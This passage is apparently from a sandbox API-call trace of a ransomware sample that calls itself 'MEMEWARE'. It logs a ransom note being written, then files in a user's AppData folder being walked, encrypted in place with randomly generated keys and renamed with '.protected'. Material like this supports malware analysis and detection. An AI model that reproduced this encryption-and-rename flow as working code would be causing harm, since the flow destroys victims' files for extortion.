(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.429] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0089.429] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.429] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0089.429] CloseHandle (hObject=0xb4) returned 1 [0089.429] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Program Files") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Program Files (x86)") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="$Recycle.bin") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="System Volume Information") returned -1 [0089.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 49 [0089.429] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0089.429] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0089.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*") returned 51 [0089.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0089.429] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.429] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.") returned 51 [0089.429] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.429] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.429] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.429] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.430] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.430] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.430] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\..") returned 52 [0089.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.430] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Windows") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Program Files") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Program Files (x86)") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="$Recycle.bin") returned 1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="System Volume Information") returned -1 [0089.430] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrIW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".protected") returned 0x0 [0089.430] lstrcmpW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.430] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.430] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".txt") returned 0x0 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".rar") returned 0x0 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".zip") returned 0x0 [0089.430] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.431] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.431] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.432] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.432] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.432] CloseHandle (hObject=0xd4) returned 1 [0089.435] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3.protected") returned 79 [0089.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3.protected")) returned 1 [0089.436] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Windows") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Program Files") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Program Files (x86)") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="$Recycle.bin") returned 1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="System Volume Information") returned -1 [0089.436] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrIW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".protected") returned 0x0 [0089.436] lstrcmpW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.436] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.436] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".txt") returned 0x0 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".rar") returned 0x0 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".zip") returned 0x0 [0089.436] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xa35, lpOverlapped=0x0) returned 1 [0089.437] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff5cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.437] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xa35, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xa35, lpOverlapped=0x0) returned 1 [0089.438] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.438] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.438] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.438] CloseHandle (hObject=0xd4) returned 1 [0089.439] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav.protected") returned 78 [0089.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav.protected")) returned 1 [0089.440] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Windows") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Program Files") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Program Files (x86)") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="$Recycle.bin") returned 1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="System Volume Information") returned -1 [0089.440] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrIW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".protected") returned 0x0 [0089.440] lstrcmpW (lpString1="0ejC8uOVaEm_.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.440] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.440] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".txt") returned 0x0 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".rar") returned 0x0 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".zip") returned 0x0 [0089.440] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.441] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.441] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.442] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.442] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.442] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.442] CloseHandle (hObject=0xd4) returned 1 [0089.442] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3.protected") returned 76 [0089.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3.protected")) returned 1 [0089.443] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Windows") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Program Files") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Program Files (x86)") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="$Recycle.bin") returned 1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="System Volume Information") returned -1 [0089.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.443] StrStrIW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".protected") returned 0x0 [0089.443] lstrcmpW (lpString1="1lBEed2dKI61.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".txt") returned 0x0 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".rar") returned 0x0 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".zip") returned 0x0 [0089.444] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.444] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.444] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.445] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.445] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.445] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.445] CloseHandle (hObject=0xd4) returned 1 [0089.446] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3.protected") returned 76 [0089.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3.protected")) returned 1 [0089.446] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0089.446] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned 55 [0089.446] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0089.447] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0089.447] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*") returned 57 [0089.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.475] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\.") returned 57 [0089.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.475] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\..") returned 58 [0089.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.475] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 